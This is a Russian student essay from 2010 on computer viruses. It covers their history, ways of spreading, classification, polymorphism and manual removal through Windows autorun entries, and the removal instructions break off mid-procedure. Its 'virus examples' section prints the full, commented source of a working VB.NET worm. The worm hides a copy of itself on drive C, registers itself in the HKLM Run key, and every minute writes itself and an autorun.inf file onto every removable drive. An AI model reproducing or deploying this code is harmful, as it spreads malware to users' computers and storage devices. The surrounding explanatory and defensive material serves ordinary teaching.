Федеральное агентство связи

Бурятский филиал ГОУ ВПО СибГУТИ 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Реферат

По  дисциплине «Информатика ОИТ»

На  тему: «Компьютерные вирусы» 
 
 
 
 
 
 

Выполнил  студент группы ПОВТ-101: Матвеев А. П. 

Проверил  преподаватель: Гарипова Г. Х. 
 
 
 
 
 
 
 
 
 
 

Улан-Удэ

2010 

Содержание

Введение 3

2. Компьютерные вирусы 5

a. Распространение 5

I. Общий механизм 5

II. Каналы распространения 5

b. Классификация 6

3. Полиморфные вирусы 6

4. Примеры вирусов 7

5. Способ удаления вирусов 9

a. Расположение списков автозагрузке в системе Windows 9

I. Списки первой категории 9

II. Списки второй категории 10

b. Обнаружение вируса 11

c. Удаление вируса и последствий заражения 12

I. Блокирование доступа к файлу 12

II. Перезагрузка компьютера и удаление вируса из разделов автозагрузки 15

III. Разблокирование вируса и его окончательное удаление 15

Заключение 17

Список литературы 18 
 
 

Введение

  У большинства людей сегодня есть компьютер. Но просто компьютера недостаточно для полноценной работы на нём. Для того чтобы компьютер отвечал запросам пользователя используют исполняемы расширения – программы, которые поставляются в виде набора инструкций и нужных ей данных сохранённых в файле или группе файлов. Программы в основном разрабатываются для  помощи в работе пользователю.

  Основы  теории самовоспроизводящихся механизмов в программах заложил Джон фон Нейман, который в 1951 году предложил метод создания таких механизмов. С 1961 года известны рабочие примеры таких программ.

  Первыми известными вирусами являются «Virus 1,2,3» и «Elk Cloner» появившиеся в 1981 году. Зимой 1984 года появились первые антивирусные утилиты — CHK4BOMB и BOMBSQAD авторства Анди Хопкинса (англ. Andy Hopkins). В начале 1985 года Ги Вонг (англ. Gee Wong) написал первый резидентный антивирус DPROTECT.

  Первые  вирусные эпидемии относятся к 1987-1989 годам:

• Jerusalem
• Червь Морриса
• DATACRIME

  Тогда же оформились основные классы двоичных вирусов: сетевые черви, полиморфные  вирусы, стелс-вирусы.

  Параллельно оформляются организованные движения как про-, так и антивирусной направленности: в 1990 году появляются специализированная BBS Virus Exchange, «Маленькая чёрная книжка о компьютерных вирусах» Марка Людвига, первый коммерческий антивирус Symantec Norton Antivirus.

  В 1992 году появились первый конструктор  вирусов для PC — VCL, а также готовые  полиморфные модули и модули шифрования для встраивания в новые вирусы.

  В несколько последующих лет были окончательно отточены стелс - и полиморфные технологии, а также испробованы самые необычные способы проникновения в систему и заражения файлов. Кроме того, появились вирусы, заражающие объектные файлы и исходные тексты программ. С распространением пакета Microsoft Office получили распространение макровирусы.

  С распространением сетей и Интернета  файловые вирусы всё больше ориентируются на них как на основной канал

  Вирус Win95.CIH достиг апогея в применении необычных  методов, перезаписывая Flash Bios заражённых машин (эпидемия в июне 1998 считается самой разрушительной за предшествующие годы).

  В конце 1990-x — начале 2000-x с усложнением  ПО и системного окружения, массовым переходом на сравнительно защищённые Windows семейства NT, закреплением сетей  как основного канала обмена данными, а также успехами антивирусных технологий в обнаружении вирусов, последние  стали всё больше заменять внедрение  в файлы на внедрение в операционную систему и подменять полиморфизм  огромным количеством видов.

  Вместе  с тем, обнаружение в Windows и другом распространённом ПО многочисленных уязвимостей открыло дорогу червям-эксплоитом. В 2004 г. беспрецедентные по масштабам эпидемии вызывают MsBlast (более 16 млн систем по данным Microsoft), Sasser и Mydoom (оценочные ущербы 500 млн долл. и 4 млрд долл. соответственно).

  Кроме того, монолитные вирусы в значительной мере уступают место комплексам вредоносного ПО с разделением ролей и вспомогательными средствами. Также расцветают социальные технологии — спам и фишинг — как средство заражения в обход механизмов защиты ПО.

  Вначале на основе троянских программ, а  развитием технологий p2p-сетей —  и самостоятельно — набирает обороты  самый современный вид вирусов — черви-ботнеты. Вирусы в числе прочего вредоносного ПО окончательно оформляются как средство киберпреступности.

2. Компьютерные  вирусы

  Компьютерный  вирус - разновидность компьютерных программ, отличительной особенностью которой является способность к размножению (саморепликация), а в большинстве случаев ещё и вредоносная деятельность. В дополнение к этому вирусы могут без ведома пользователя выполнять прочие произвольные действия, в том числе наносящие вред пользователю и/или компьютеру.

  Вирусы  не следуют путать с троянами, Spyware, спамом.

  Создание  и распространение вредоносных  программ (в том числе вирусов) преследуется в России согласно Уголовному Кодексу РФ (глава 28, статья 273).

  Согласно  доктрине информационной безопасности РФ, в России должен проводиться  правовой ликбез в школах и вузах  при обучении информатике и компьютерной грамотности по вопросам защиты информации в ЭВМ, борьбы с компьютерными  вирусами, детскими порно сайтами  и обеспечению информационной безопасности в сетях ЭВМ.

1. Распространение

1. Общий механизм

  Вирусы  распространяются, копируя своё тело и обеспечивая его последующее исполнение: внедряя себя в исполняемый код других программ, заменяя собой другие программы, прописываясь в автозапуск и другое. Вирусом или его носителем может быть не только программы, содержащие машинный код, но и любая информация, содержащая автоматически исполняемые команды — например, пакетные файлы и документы Microsoft Word и Excel, содержащие макросы. Кроме того, для проникновения на компьютер вирус может использовать уязвимости в популярном программном обеспечении (например, Adobe Photoshop, Internet Explorer, Outlook), для чего распространители внедряют его в обычные данные (картинки, тексты, и т. д.) вместе с эксплоитом, использующим уязвимость.

2. Каналы  распространения

  Вирус может распространяться через носители информации и сеть. Популярные способы распространения:

1. Флэш-накопители (флэшки):

  В настоящее время флешки - большое количество вирусов распространяется через съёмные накопители, включая цифровые фотоаппараты, цифровые видеокамеры, цифровые плееры (MP3-плееры), сотовые телефоны. Использование этого канала преимущественно обусловлено возможностью создания на накопителе специального файла автозапуска (autorun.inf в случае с Windows), в котором можно указать программу, запускаемую после того, как флэшка будет установлена или отрыта (Проводником Windows опять таки в случае с Windows. В Windows 7 возможность автозапуска файлов с переносных носителей была устранена.). Флешки — основной источник заражения для компьютеров, не подключённых к Интернету.

2. Интернет и локальные сети (черви)

  Черви — вид вирусов, которые проникают  на компьютер-жертву без участия  пользователя. Черви используют так  называемые «дыры» (уязвимости) в программном  обеспечении операционных систем, чтобы  проникнуть на компьютер. Уязвимости —  это ошибки и недоработки в  программном обеспечении, которые  позволяют удалённо загрузить и выполнить машинный код, в результате чего вирус-червь попадает в операционную систему и, как правило, начинает действия по заражению других компьютеров через локальную сеть или Интернет. Злоумышленники используют заражённые компьютеры пользователей для рассылки спама или для DDoS-атак.

3. Веб-страницы

  Возможно  также заражение через страницы Интернета ввиду наличия на страницах  всемирной паутины различного «активного»  содержимого: скриптов, ActiveX-компонент. В этом случае используются уязвимости программного обеспечения (в том числе и уязвимости платформ воспроизведения веб-приложений), установленного на компьютере пользователя, либо уязвимости в ПО владельца сайта (что опаснее, так как заражению подвергаются добропорядочные сайты с большим потоком посетителей), а ничего не подозревающие пользователи, зайдя на такой сайт, рискуют заразить свой компьютер.

4. Электронная почта

  Обычно  вирусы в письмах электронной  почты маскируются под безобидные вложения: картинки, документы, музыку, ссылки на сайты. В некоторых письмах  могут содержаться действительно  только ссылки, то есть в самих письмах  может и не быть вредоносного кода, но если открыть такую ссылку, то можно попасть на специально созданный  веб-сайт, содержащий вирусный код. Многие почтовые вирусы, попав на компьютер  пользователя, затем используют адресную книгу из установленных почтовых клиентов типа Outlook для рассылки самого себя дальше. Чаще всего эти письма являются спамом.

5. Системы обмена мгновенными сообщениями и социальные сети

  Также распространена рассылка ссылок на якобы  фото, музыку либо программы, в действительности являющиеся вирусами, по ICQ и через  другие программы мгновенного обмена сообщениями. Также как и в электронной почте, эти сообщения чаще всего являются спамом.4

2. Классификация

По поражаемым объектам

По дополнительной вредоносной функциональности

По языку, на котором написан вирус

По технологиям, используемым вирусом

По поражаемым операционным системам и платформам

Следует отметить то, что единой системы классификации и именования вирусов не существует (хотя попытка создать стандарт была предпринята на встрече CARO в 1991 году)

3. Полиморфные вирусы

  Полиморфные вирусы – вирусы, которые при самовоспроизведении изменяют свой код. Данная техника может затруднить обнаружения вируса с помощью скан-строк и в некоторых случаях при помощи эвристики. Любые два файла, заражённые одним и тем же полиморфным вирусом, с большой вероятностью не будут иметь сколь-либо совпадающие под последовательности в заражённых частях файлов.

  Полиморфизм следует отличать от вирусов с  изменяющимся алгоритмом шифрования.

  Полиморфизм заключается в формировании кода вируса «на лету» — уже во время исполнения, при этом сама процедура, формирующая код также не должна быть постоянной и видоизменяется при каждом новом заражении. Большинство антивирусных программ пытаются обнаружить вредоносный код, соответствующий компьютерному вирусу, или часть кода такого вируса, посредством проверки файлов и данных, находящихся на компьютере или пересылаемых через компьютерную сеть или Интернет. Если изменить код вируса, отвечающий за поиск и заражение новых файлов или какую-либо другую важную его часть, то антивирус не сможет обнаружить такой «изменённый» вирус. Часто код вируса «меняют», добавляя операторы NOP или другие операторы, не изменяющие алгоритм. Таким образом, обнаружение по-настоящему полиморфных вирусов с помощью скан-строк невозможно. После появления полиморфизма антивирусные продукты, в свою очередь, также освоили новые техники: эвристика и эмуляторы кода.

4. Примеры вирусов

1. Module Module1
2. Const LenName As Long = 7
4. Dim TmpTimer As System.Threading.Timer
5. ''' <summary>
6. ''' Вызов этого метода происходит единожды при запуске вируса.
7. ''' </summary>
8. ''' <remarks>Данный метод не вернет управление вызывающему методу, если тело вируса запущено с диска C</remarks>
9. Sub Main() 'Процедура, в которую попадает управление сразу после запуска вируса
10. If UCase(Left(System.Windows.Forms.Application.ExecutablePath, 1)) = UCase("C") Then 'Запущен ли вирус с диска C
11. 'Вирус запущен с диска C
12. 'Создаем новый поток, т.к. этот потом уснет навсегда
13. Dim NewThr As New Threading.Thread(Sub()
14. TmpTimer = New System.Threading.Timer(AddressOf TimerTick, Nothing, 0, 1 * 60 * 1000) 'Через каждую минуту вирус будет проверять прописан ли он в автозагрузку и будет себя копировать на флеш карту
15. End Sub)
17. NewThr.Start() 'Стартуем поток
19. Threading.Thread.Sleep(-1) 'Усыпляем пользовательский поток навсегда, чтобы вирус не завершил свою работу. Для работы есть другие...
20. Else 'Если не с диска C
21. Try 'На всякий случай ставим пустой обработчик событий
22. Shell(CopyToC(), AppWinStyle.Hide, False, -1) 'Вызываем процедуру копирования на диск и запуска вируса с диска C
23. Catch
24. 'Здесь должен быть обработчик ошибок, но он нам не нужен
25. End Try
26. End If
27. End Sub 'Наступил конец программы... Выход!!!
29. ''' <summary>
30. ''' Эта функци копирует вирус на диск C
31. ''' </summary>
32. ''' <returns>CopyToC возаращает полный путь до вируса</returns>
33. ''' <remarks>Из-за запрета копирования могут происходить исключения</remarks>
34. Function CopyToC() As String 'Процедура копирования вирусняка на диск C
35. Dim NameFile As String = Right(Left(CStr(VBMath.Rnd(999999999)), LenName + 2), LenName) + ".exe" 'Создаем уникальное имя, чтоб маловероятно было папсть на существующий файл
37. FileCopy(System.Windows.Forms.Application.ExecutablePath, "C:\" + NameFile) 'Копируем
39. FileIO.FileSystem.GetFileInfo("C:\" + NameFile).Attributes = IO.FileAttributes.Hidden + IO.FileAttributes.System + IO.FileAttributes.NotContentIndexed + IO.FileAttributes.ReadOnly 'Скрываем и защищаем вирус...
40. Return "C:\" + NameFile 'Возвращаем полный путь до исполняемого файла вируса на диске C
41. End Function
43. ''' <summary>
44. ''' Данный метод вызывается при срабатывании таймера для проверки записи в раздел реестра, отвечающий за автозагрузку и записи на съёмные носители
45. ''' </summary>
46. ''' <param name="sender">Данный параметр роли не играет. Его значение может быть любым, но рекомендуется Null(Nothing в VB)</param>
47. ''' <remarks></remarks>
48. Sub TimerTick(ByVal sender As Object) 'Вызывается по срабатыванию таймера
49. VerifyRegisterAutoStart() 'Проверяем запись в автозагрузку и если её нету, то записываемся...
51. 'Этот код находит все съемные носители и записывает себя на них и создает/перезаписывает файл autorun.inf для того, чтобы он мог распрострянятся на другой комп...
52. Dim Comp As New Microsoft.VisualBasic.Devices.Computer
53. For Each Drv As System.IO.DriveInfo In Comp.FileSystem.Drives 'Перебираем все имеющиеся диски...
54. If Drv.DriveType = IO.DriveType.Removable Then 'Смотрим тип диска и если он съемный, то вызываем метод записи вируса на этот носитель
55. WriteAutorun(Drv) 'Вызов метода WriteAutorun
56. End If
57. Next
58. End Sub
60. ''' <summary>
61. ''' Этот метод нужен для записи на съемный носитель файла autorun.inf и самого вируса
62. ''' </summary>
63. ''' <param name="Drive">Информация о диске, на который нужно записать вирус</param>
64. ''' <remarks></remarks>
66. Sub WriteAutorun(ByVal Drive As IO.DriveInfo)
67. SyncLock New String(1) {"2", "3"} 'Навсякий случай выставим мультипоточную защиту...
68. 'Инициализируем некоторые переменные...
69. Dim FileStr As System.IO.FileStream
70. Dim TextStr As IO.StreamWriter
72. Try 'Вдруг запись будет проходить на диск A:, в котором нету диска и чтобы вирус не крешнулся, ставим обработчик исключений
73. Try 'В этом обработчике находится код удаления старого autorun.inf... чистим место... Если его нету, то возникнит исключение и чтобы не покидать метод записи ставим обработчик...
74. FileIO.FileSystem.DeleteFile(Drive.RootDirectory.FullName + "autorun.inf")
75. Catch ex As Exception
77. End Try
79. FileStr = System.IO.File.Create(Drive.RootDirectory.FullName + "autorun.inf") 'Создаем новый autorun.inf и сразу же получаем поток, для управления им
80. TextStr = New IO.StreamWriter(FileStr) 'Получаем объект, более удобного класса, для работы с потоком записи...
82. TextStr.WriteLine("[autorun]") 'Пишем "[autorun]" в autorun.inf и ставим символы перехода на новую строку
83. Dim NameFile As String = Right(Left(CStr(VBMath.Rnd(999999999)), LenName + 2), LenName) + ".exe" 'Создаем уникальное имя, чтоб маловероятно было попасть на существующий файл
86. FileCopy(System.Windows.Forms.Application.ExecutablePath, Drive.RootDirectory.FullName + NameFile)
87. FileIO.FileSystem.GetFileInfo(Drive.RootDirectory.FullName + NameFile).Attributes = IO.FileAttributes.Hidden + IO.FileAttributes.System + IO.FileAttributes.NotContentIndexed + IO.FileAttributes.ReadOnly 'Скрываем и защищаем вирус...
88. FileIO.FileSystem.GetFileInfo(Drive.RootDirectory.FullName + "autorun.inf").Attributes = IO.FileAttributes.Hidden + IO.FileAttributes.NotContentIndexed 'Скрываем и защищаем файл автозапуска...
90. TextStr.WriteLine("open=" + NameFile) 'Пишем в autorun.inf "open='Путь к вирусу, относительно корня диска'". Тут указывается то, что нужно запустить вирус, после того, как флэшка будет "воткнута" в компьютер...
92. TextStr.Close() 'Закрываем поток записи в autorun.inf и сбрасываем всё содержимое памяти(все что мы выше писали, писали не в файл, а в память) в файл...
93. Catch ex As Exception
94. Try
95. TextStr.Close()
96. Catch ex1 As Exception
98. End Try
100. Try
101. FileStr.Close()
102. Catch ex2 As Exception
104. End Try
105. End Try
106. End SyncLock
107. End Sub
109. ''' <summary>
110. ''' Данный метод проверяет то, что текущий исполняемый файл записан в кусте реестра("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\") и если этой записи там нету, то создает и записывает её
111. ''' </summary>
112. ''' <remarks></remarks>
113. Sub VerifyRegisterAutoStart()
114. Dim RunReg As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", True) 'Открываем ключ реестра Run
116. For Each Str As String In RunReg.GetValueNames() 'Перебираем все значения
117. If CStr(RunReg.GetValue(Str)) = System.Windows.Forms.Application.ExecutablePath Then 'Сравниваем запись пути в одном из значений и путь, по которому запущено текущее приложение...
118. Return 'Если указано то, что это приложение будет запущено, выходим из метода...
119. End If
120. Next
122. Dim NameReg As String = Right(Left(CStr(VBMath.Rnd()), LenName + 2), LenName) 'Создаем имя для значения
124. RunReg.SetValue(NameReg, System.Windows.Forms.Application.ExecutablePath, Microsoft.Win32.RegistryValueKind.String) 'Записываем значение с указанным именем и путем
125. End Sub
126. End Module

5. Способ  удаления вирусов

  Все вирусы после заражения прописываются  в любые места, где их система (или какое-то приложение) при загрузке или использовании запустит. Эти  места могут являться автозагрузкой  или списком драйверов или  списком плагинов к приложению и  пр.

  Для того чтобы найти и удалить  вирус нужно просмотреть эти  места. Если разбить по сложности  анализа данных, то все места можно  разбить на две категории:

• Места либо являющиеся сложные для анализа и/или опасные для изменения (список драйверов и служб) либо являющиеся специализированные для какого-либо приложения (список плагинов и т.п.)
• Места, в которых находится простые и понятные списки автозагрузки, при удаления одного из пунктов сбоя системы не произойдёт, а просто данная программа не запустится. Да и названия ярлыков и ссылок знакомы пользователю, т.к. в их названиях используют либо названия сокращений программ, либо понятные сокращения служебных программ

  Вирус легче всего находить и удалять  из второй группы вирусов. В дальнейшем речь пойдёт о них.

1. Расположение списков автозагрузке в системе Windows

  В операционной системе Windows существуют две категории списков автозагрузки:

• Списки, находящиеся в файловой системе
• Списки, находящиеся в реестре Windows

1. Списки  первой категории

  К спискам, располагаемым в файловой системе, относятся две папки:

• Из первой папки программы будут запускаться во всех пользователях и располагается она по адресу %systemdrive%\Document and Settings\All Users\Главное меню\Программы\Автозагрузка (%systemdrive%\Users\All Users\Главное меню\Программы\Автозагрузка – в случае с версиями Windows старше 6.0 (Windows Vista и более новые)).
• Из второй папки программы будут запускаться только при заходе в текущий пользователь, из под которого ведётся доступ к этой папки. Путь:%userprofile%\Главное меню\Программы\Автозагрузка.

  В данных папках размещаются любые  исполняемые файлы (в т. ч. и ярлыки на исполняемые файлы).

2. Списки  второй категории

  В реестре всего два списка (не учитывая их модификации) явно предназначенных  для автозагрузки, но вирусы активно  используют другие списки о которых я расскажу позже в этом разделе.

  Сначала о первых двух:

• Первый список находится в HKLM\Software\Microsoft\Windows\CurrentVersion\Run. В данном списке находятся программы, которые будут запущены в любом пользователе, во время его входа в систему.
• Второй список находится в HKCU\Software\Microsoft\Windows\CurrentVersion\Run. В данном списке находятся программы, которые будут запущены только в том пользователе, от которого ведётся доступ к реестру.

  У каждого списка есть две модифицированные копии: RunOnce и RunOnceEx (путь к ним такой же как и у предыдущих двух, только Run на конце нужно заменить RunOnce или RunonceEx). Их основное отличие в том, что программа, указанная в этом списке, будет запущена всего лишь один раз, т. е. после запуска всех программ из этих списков, список отчищается.

  К третьему, четвёртому и пятому списку можно отнести не предназначенные для автозапуска списки, но из-за активного использования вирусом я решил их здесь упомянуть:

• Третий список содержит список утилит за инициализацию пользователя и запуска системного проводника (он отображает рабочий стол, панель задач, ведёт обзор папок и запускает программы находящиеся в выше перечисленных списках автозагрузки программы). Эта утилита выполняется от имени пользователя, в которого был осуществлён вход и запускается системным процессом Winlogon.exe, который отвечает за вход в систему.
• Четвёртый содержит указание на программу более красивого графического интерфейса для сообщений о завершении работы, выхода и захода в пользователь а также авторизации и др. прочих сообщениях. Данная программа не имеет право запускать от себя дочерние программы, а сама запускается от пользователя SYSTEM.
• Пятый, также как и четвёртый, является списком из одного элемента. В нём указывается системный проводник.

  Все списки находятся в ключе HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.

  Третий список представляет собой одно значение ключа, элементы которого записываются через запятую имя значения “Userinit”. По умолчанию там всего лишь один элемент: «C:\WINDOWS\system32\userinit.exe» - эта стандартная программа по инициализации пользовательского интерфейса и запуска проводника. В данном списке их может быть много. Данный список можно использовать для блокирования доступа к пользовательскому интерфейсу проводника и просьбы за него выкуп.

  Четвёртый список является списком из одного элемента и значение пары имя - значения с именем “UIHost” указывает программу для отображения более красивого пользовательского интерфейса на сообщения о запуске/завершения работы системы и входа выхода из неё. Хотя и запускать дочерние приложения не позволяется данный список может использоваться вирусами, которые блокируют доступ к системе и просят за открытие доступа деньги. Возможно (Этого я не проверял) также установка хуков в другие процессы (включая services.exe, winlogon.exe, lsass.exe и пр.), в последствии управляя компьютером и запуская программы от суперпользователя SYSTEM, который имеет доступ к хранилищу сертификатов и хеш-сумм паролей от всех пользователей.

  Пятый список также является одноэлементным и пара имя – значение с именем «Shell» содержит в себе указания на системный проводник. Также как и два других списка может использоваться для блокирования доступа к проводнику и просьбы за него выкупа.

2. Обнаружение вируса

  При проверки списков автозагрузки можно  встретить кучу программ, и каким  способом узнать какая из них является вирусом, а какая нормальная? Этим сейчас мы и займёмся. Для явных списков автозагрузки подход в принципе одинаковый (это две папки Автозагрузки, из которых виртуально формируется одна в меню Пуск, и разделы реестра Run(и его модифицированные разделы)). Для параметров находящихся в разделе Winlogon нужно просто сравнить значения которые установлены по умолчанию с теми которые записаны в реестре.

  Начнём  с первых списков. Если заглянуть  в эти списки, то можно увидеть много программ. Но какие программы, указанные в данных списках, являются вирусом, а какие нет? Для того чтобы определить это нужно немного проанализировать пару имя – значения. Отличие вирусных записей, от обычных программ, часто видно в том то, что такую программу вы не ставили (или этого производителя), ссылка указывает на файл с непонятным названием:

• Название файла создано случайном образом (как пример 56463.exe, d55ds85d.exe и т.п.)
• Путь указывает на системную папку (не на папку Program Files)

  При просмотре свойств у данных файлов отсутствует иконка или она непонятна, при просмотре вкладки Версия не указаны никакие данные, либо указаны данные непонятных компаний, либо она вообще отсутствует, также у вирусов не бывает сертификатов и бывает небольшой объем (до 1МБ – 512КБ).

  После обнаружения непонятных файлов их лучше  всего просканировать онлайн сканерами  на сайтах производителей антивирусов, либо скачать пробную версию антивируса и проверить ей, и если в файле антивирус вирусов не обнаруживает, но вы очень сомневаетесь то, что он не вирус, то отправьте вирусным аналитикам,  которые работают при каждой антивирусной компании. Они будут рады, если вы пришлёте им не определяющийся вирус.

3. Удаление вируса и последствий заражения

  После определения местоположения вируса нужно его каким-либо образом  удалить. Но каким? Сейчас я все расскажу. Для быстрого удаления вируса и если при первых шагах вы случайно получите отказ системы или системы, то это можно обратить с любого Windows LiveCD или редактора файловой системы. Для работы этого способа потребуется файловая система NTFS.

  Для того чтобы полностью удалить  вирус нужно выполнить следующий  порядок команд:

1. Заблокировать доступ к исполняемому файлу вируса
2. Перезагрузить компьютер и принять сообщения, о невозможности запуска вируса
3. Удалить сведения о вирусе из списков автозагрузки
4. Разблокировать исполняемый файл вируса
5. Удалить исполняемый файл вируса

1. Блокирование  доступа к файлу

  Для того чтобы заблокировать доступ к файлу нужно кликнуть правой кнопкой на файле, далее нажать свойства и перейти на вкладку Безопасность.

  Рис 1. Окно «Свойства» и вкладка «Безопасность»

  После Нужно нажать кнопку «Дополнительно».

   Рис 2. Окно «Дополнительные параметры безопасности»,

  открывшееся после нажатия  кнопки «Дополнительно».

  Затем «Добавить…». В последующем окне «Дополнительно…». В следом открывшемся  окне «Поиск», найти там пользователя «Все» и нажать «Ок».

   Рис 3. Окно «Выбор: пользователь или группа».

   Рис 4. Окно, открывшееся после нажатия «Добавить…».

  Тут ещё раз надо нажать «Ок». После  откроется окно, представленное на рисунке 8.